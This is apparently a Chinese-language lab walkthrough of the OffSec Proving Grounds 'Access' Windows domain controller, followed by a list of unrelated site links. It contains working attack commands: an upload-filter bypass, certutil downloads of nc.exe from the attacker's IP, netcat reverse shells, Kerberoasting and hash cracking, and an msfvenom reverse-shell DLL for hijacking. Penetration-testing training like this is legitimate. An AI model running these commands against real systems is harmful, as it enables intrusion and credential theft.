namp 
nmap -p- -A -sS -T4 192.168.200.187

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 00:24 UTC

Stats: 0:02:36 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan

NSE Timing: About 98.45% done; ETC: 00:26 (0:00:00 remaining)

Nmap scan report for 192.168.200.187

Host is up (0.071s latency).

Not shown: 65514 filtered tcp ports (no-response)

PORT      STATE SERVICE       VERSION

53/tcp    open  domain        Simple DNS Plus

80/tcp    open  http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)

|_http-title: Access The Event

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7

88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-23 00:26:00Z)

135/tcp   open  msrpc         Microsoft Windows RPC

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)

445/tcp   open  microsoft-ds?

464/tcp   open  kpasswd5?

593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp   open  tcpwrapped

3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)

3269/tcp  open  tcpwrapped

5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

9389/tcp  open  mc-nmf        .NET Message Framing

49666/tcp open  msrpc         Microsoft Windows RPC

49667/tcp open  msrpc         Microsoft Windows RPC

49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

49674/tcp open  msrpc         Microsoft Windows RPC

49675/tcp open  msrpc         Microsoft Windows RPC

49699/tcp open  msrpc         Microsoft Windows RPC

49738/tcp open  msrpc         Microsoft Windows RPC

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

OS fingerprint not ideal because: Missing a closed TCP port so results incomplete

No OS matches for host

Network Distance: 4 hops

Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-time:

|   date: 2024-12-23T00:26:57

|_  start_date: N/A

| smb2-security-mode:

|   3:1:1:

|_    Message signing enabled and required

TRACEROUTE (using port 80/tcp)

HOP RTT      ADDRESS

1   70.57 ms 192.168.45.1

2   70.55 ms 192.168.45.254

3   71.24 ms 192.168.251.1

4   71.36 ms 192.168.200.187

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 191.49 seconds

观察端口开放情况 发现53 和 88两个端口都开着 可以确认是一台域控服务器

访问80端口



扫描网站

发现forms 目录



uploads目录



尝试给他发送邮件 发现报错 Error: Unable to load the "PHP Email Form" Library!

还发现一个测试点



他存在文件扩展名检测

我们抓包 将shell.php 改成shell.php:.jpg 上传实现绕过



发现我们上传成功 但是内容为0kb



我们要进行追加操作



发现成功



那么接下来尝试反弹shell

certutil -urlcache -split -f http://192.168.45.250/nc.exe nc.exe 下载nc.exe

nc -e cmd 192.168.45.250 80反弹shell

进入提权环节

继续搜集一下信息

ldap协议发现没啥东西

然后就不太会了

看wp

先用这个脚本 获取域环境下的所有spn

https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1?source=post_page-----b95d3146cfe9--------------------------------



发现了mssql的spn

指定请求该spn的tgs

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'

将tgs导出

wp用的是这个脚本

https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1?source=post_page-----b95d3146cfe9--------------------------------

这个命令.\Invoke-Kerberoast.ps1

但我发现我运行之后没反应

经过搜索我发现一个这样用

import-module ./Invoke-Kerberoast.ps1

Invoke-Kerberoast -OutputFormat Hashcat | fl

哈希出来了

那么接下来我们要做的就是爆破哈希值 得到mssql这个账户的密码

john st --wordlist=/root/Desktop/fuzz/rockyou.txt/rockyou.txt

爆破成功 trustno1



尝试拿shell evil-winrm -u svc_mssql -p trustno1 -i 192.168.200.187



发现报错

再试另一个

impacket-wmiexec access/svc_mssql:trustno1@192.168.200.187



tmd 也不行 服了

不拿shell了 看看有无共享文件

crackmapexec smb 192.168.200.187 -u svc_mssql -d access.offsec -p "trustno1" --shares

再上传一个脚本

import-module .\Invoke-RunasCs.ps1导入脚本

Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami" 执行命令 这个类似于sudo



执行成功

执行反弹shll

Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:\xampp\htdocs\uploads\nc.exe -e cmd 192.168.45.250 135"

反弹成功



终于拿到第一个flag了

发现SeChangeNotifyPrivilege 权限 可以提权



用这个

https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public?source=post_page-----b95d3146cfe9--------------------------------

现在我们再c盘有可写权限

现在我们用dll劫持来进行提权

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll

靶机上执行

certutil -urlcache -split -f "http://192.168.45.250:88/tzres.dll" C:\Windows\System32\wbem\tzres.dll

再执行systeminfo

发现我失败了 没反应

但是wp成功了

不知道除了啥问题 估计是靶场有些小问题

理论上到这一步就提权成功了

Access pg walkthrough Intermediate window域渗透的更多相关文章

  1. 初级AD域渗透系列

      net group /domain 获得所有域用户组列表 net group “domain admins” /domain 获得域管理员列表 net group “enterprise admi ...

  2. Metasploit域渗透测试全程实录(终结篇)

    本文作者:i春秋签约作家——shuteer 前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里.于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴 ...

  3. 域渗透基础之NTLM认证协议

    域渗透基础的两个认证协议ntlm和Kerberos协议是必须总结的~ 这篇简单总结下ntlm协议 晚上写下kerberos 0x01 NTLM简介 NTLM使用在Windows NT和Windows ...

  4. 域渗透:SPN(ServicePrincipal Names)的利用

    SPN 简介:服务主体名称(SPN:ServicePrincipal Names)是服务实例(可以理解为一个服务,比如 HTTP.MSSQL)的唯一标识符.Kerberos 身份验证使用 SPN 将服 ...

  5. 域渗透复盘(安洵CTF线下)

    复盘线下域渗透环境Write Up 0x01 外网web到DMZ进域 外网web入口 joomla应用   192.168.0.5 反序列化打下来 GET /index.php HTTP/1.1 Ho ...

  6. AD域渗透总结

    域渗透总结 学习并做了一段时间域网络渗透,给我直观的感受就是思路问题和耐心,这个不像技术研究,需要对一个点进行研究,而是遇到问题后要从多个方面思考,寻找"捷径"思路,只要思路正确, ...

  7. 内网域渗透之MS14-068复现(CVE-2014-6324)

    在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...

  8. 内网域渗透之MS14-068复现

    在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...

  9. 域渗透-Kerberos身份验证流程

    域渗透-Kerberos身份验证流程 Kerberos协议框架 在 Kerberos 协议中主要是有三个角色的存在: 1. 访问服务的 Client: 2. 提供服务的 Server: 3.KDC(K ...

  10. 域渗透之通过DCSync获取权限并制作黄金票据

    环境背景 账号: admin 没有域管权限 admin02 有域管权限 administrator 有域管权限 模拟渗透过程: 利用任意方法已经登录到client1(Windows 7),在clien ...

随机推荐

  1. python列表自动扩容机制

    问题引入:在对比列表与元组的优缺点时,百度答案为:列表是可变的,可以随时进行增加.修改.删除操作,可以进行动态扩容,动态扩容是以牺牲性能损耗的为代价的,于是我搜索了一下列表的动态扩容 当在创建一个列表 ...

  2. 关于linux 终端的小命令

    Ubuntu 为例 ctrl alt t   新开一个终端(默认工作目录) ctrl shift t 在当前终端开一个tab (工作目录和当前tab一致 当你进入一个很深的目录的时候需要新开一个命令行 ...

  3. Pcb-Merging:无需训练的多任务模型合并方案 | NeurIPS'24

    来源:晓飞的算法工程笔记 公众号,转载请注明出处 论文: Parameter Competition Balancing for Model Merging 论文地址:https://arxiv.or ...

  4. Contrastive Learning 对比学习 | RL 学 representation 时的对比学习

    记录一下读的三篇相关文章. 01. Representation Learning with Contrastive Predictive Coding arxiv:https://arxiv.org ...

  5. golang之热加载Fresh&air

    Fresh 是一个命令行工具,每次保存Go或模版文件时,该工具都会生成或重新启动Web应用程序.Fresh将监视文件事件,并且每次创建/修改/删除文件时,Fresh都会生成并重新启动应用程序.如果go ...

  6. 启动Node.js前端项目

    跟前端同事联调的时候,有时前端同事要跟其他后端同事联调,心想就自己启个前端项目,这样前端同事跟其他后端同事联调的时候,我可以先自己调来试试. 安装Node.js,NPM,NVM等,一气呵成.将前端项目 ...

  7. 小程序:支付的时候缺少参数:total_fee,支付失败

    最开始的参数是这样写的 param: { "nonce_str": "", "package": "606eb3de10e0602 ...

  8. 理解 ASP.NET Core:Cookie 认证

    理解 ASP.NET Core:Cookie 认证 ASP.NET Core 内置提供了基于 Cookie 的认证支持.在使用 Cookie 验证的时候,相关的三要素: 认证模式名称:CookieAu ...

  9. 精通 ASP.NET Core MVC (第 7 版) 源码下载

    将使用的 .NET 版本更新到 5.0 版本. GitHub 地址:https://github.com/haoguanjun/pro-asp.net-core-mvc-2

  10. resttemplate的ReadTimeout和ConnectTimeout

    问题描述:今天,在做微服务开发中,A服务区调用B服务,获取数据做导出excel操作.A服务出现了"java.net.SocketTimeoutException: Read timed ou ...